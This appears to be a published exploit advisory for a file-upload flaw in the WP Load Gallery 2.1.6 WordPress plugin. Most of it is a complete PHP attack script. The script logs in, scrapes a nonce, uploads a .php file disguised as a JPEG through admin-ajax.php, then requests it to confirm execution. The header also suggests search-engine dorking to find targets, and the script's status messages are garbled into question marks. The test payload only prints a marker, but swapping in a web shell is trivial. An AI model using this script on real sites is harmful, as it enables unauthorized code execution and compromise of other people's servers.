WP Load Gallery 2.1.6 Shell Upload
=============================================================================================================================================
| # Title : WP Load Gallery plugin v2.1.6 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://wphive.com/plugins/wp-load-gallery/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or another search engine.

[+] The WP Load Gallery plugin version 2.1.6 suffers from a remote shell upload vulnerability (the PoC below first logs in with a WordPress account, so a valid user session is required).

[+] Save the code as poc.php.

[+] Usage : cmd => c:\www\test\php poc.php -u <URL> -un <USERNAME> -p <PASSWORD>

[+] PayLoad :

<?php
// Proof-of-concept for the WP Load Gallery 2.1.6 upload issue described above.
// Flow as implemented below: probe the plugin directory -> log in with a WordPress
// account -> read wplg_nonce from the plugin admin page -> POST a .php file to
// admin-ajax.php as a gallery upload -> fetch the file back from wp-content/uploads.
// Side effects on the machine running this script: it writes indoushka.php and
// cookies.txt (which holds the WordPress session cookie) into the current directory.
// Arguments are positional ($argv[1..3]); the -u/-un/-p flags shown in the usage
// line of the advisory text are not parsed here.
$target_url = $argv[1] ?? '';
$username = $argv[2] ?? '';
$password = $argv[3] ?? '';

if (!$target_url || !$username || !$password) {
die("Usage: php script.php <url> <username> <password>\n");
}

$target_url = rtrim($target_url, '/');
$login_url = "$target_url/wp-login.php";
$gallery_url = "$target_url/wp-admin/admin.php?page=wp-load-gallery";
$ajax_url = "$target_url/wp-admin/admin-ajax.php";
$shell_filename = "indoushka.php";
// Expected location of the stored upload; the year/month path segment is hard-coded.
$shell_path = "$target_url/wp-content/uploads/2025/02/$shell_filename";
// The uploaded file only prints a marker string; it is an existence test, not a command shell.
$shell_content = "<?php echo 'Hello, Security Test!'; ?>";
$user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0";

// Step 1: GET the plugin directory; anything other than HTTP 200 is treated as "plugin absent".
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$target_url/wp-content/plugins/wp-load-gallery/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code !== 200) {
die("[!] WP Load Gallery ??? ???? ?? ??? ????.\n");
}

// Step 2: write the marker file to the local working directory so CURLFile can read it.
file_put_contents($shell_filename, $shell_content);

// Step 3: authenticate through wp-login.php; the session cookie is persisted to cookies.txt
// and reused by every later request. Delete cookies.txt afterwards - it is a live session.
$login_data = [
"log" => $username,
"pwd" => $password,
"rememberme" => "forever",
"wp-submit" => "Log In"
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$response = curl_exec($ch);
curl_close($ch);

// Login success is inferred from the word 'dashboard' appearing in the response body.
if (!strpos($response, 'dashboard')) {
die("[!] ??? ????? ??????.\n");
}

echo "[+] ????? ?????? ????.\n";

// Step 4: load the plugin admin page and scrape the wplg_nonce hidden field.
// A WordPress nonce is a CSRF token; it does not by itself restrict what file types
// the upload handler accepts, which is why the nonce alone does not mitigate this issue.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $gallery_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$response = curl_exec($ch);
curl_close($ch);

if (preg_match('/"wplg_nonce"\s*value="(\w+)"/', $response, $matches)) {
$wplg_nonce = $matches[1];
echo "[+] ?? ??????? wplg_nonce: $wplg_nonce\n";
} else {
die("[!] ??? ??????? wplg_nonce.\n");
}

// Step 5: multipart upload through admin-ajax.php. The .php file is sent with a
// client-supplied Content-Type of image/jpeg; a handler that trusts that header
// (or the client filename) instead of enforcing an extension allowlist and
// content sniffing on the server is the defect to fix. Storing uploads where the
// web server will not execute .php is the standard hardening. For detection, look
// for POSTs to admin-ajax.php with action=wpgallery and task=wplg_upload whose
// multipart filename ends in .php, followed by a GET of a .php under wp-content/uploads.
$upload_data = [
"wplg_nonce" => $wplg_nonce,
"action" => "wpgallery",
"wplg_gallery_id" => "205",
"task" => "wplg_upload",
"wplg_gallery_file[]" => new CURLFile($shell_filename, "image/jpeg", $shell_filename)
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $upload_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$response = curl_exec($ch);
curl_close($ch);

// Upload success is inferred from the substring 'status' anywhere in the AJAX response.
if (strpos($response, 'status') !== false) {
echo "[+] ?? ??? ????? ?????!\n";
echo "[+] ?????? ?? ???? ????? ???: $shell_path\n";

// Step 6: request the stored file and check whether the marker string is echoed back,
// i.e. whether the server executed the uploaded .php rather than serving it as data.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $shell_path);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, 'Hello, Security Test!') !== false) {
echo "[+] ?? ??? ????? ????? ??? ????!\n";
} else {
echo "[!] ????? ??? ????? ?? ?? ???? ??? ?? ?????.\n";
}
} else {
echo "[!] ??? ??? ?????? ?????? ?????? ??????.\n";
}
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================